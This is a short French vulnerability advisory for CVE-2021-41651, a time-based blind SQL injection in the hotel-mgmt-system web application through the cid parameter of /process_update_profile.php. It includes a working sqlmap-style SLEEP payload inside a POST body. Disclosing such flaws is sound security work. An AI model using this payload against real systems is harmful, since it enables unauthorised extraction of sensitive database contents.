
Preuve de concept d'exploitation pour CVE-2021-41651, démontrant une injection SQL aveugle basée sur le temps non authentifiée dans hotel-mgmt-system via le paramètre cid, permettant l'extraction de données sensibles depuis MySQL.
CVE-2021-41651 Injection SQL dans hotel-mgmt-system
Le système hotel-mgmt-system est vulnérable à une attaque non authentifiée par injection SQL aveugle basée sur le temps.
Le paramètre cid de la page /process_update_profile.php n'assainit pas l'entrée utilisateur, un attaquant peut extraire des données sensibles de la base de données MySQL sous-jacente.
URL: /process_update_profile.php
PARAMÈTRE: cid
Parameter: cid ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: phone=123456778&cid=14 AND (SELECT 9048 FROM (SELECT(SLEEP(5)))zCfD)-- IKdVf&submitBtn=Update&fullName=James&[email protected]&newPassword=fasdfasdfasdfasdfasdf-

Jason Colyvas
MOBIUSBINARY
23 septembre 2021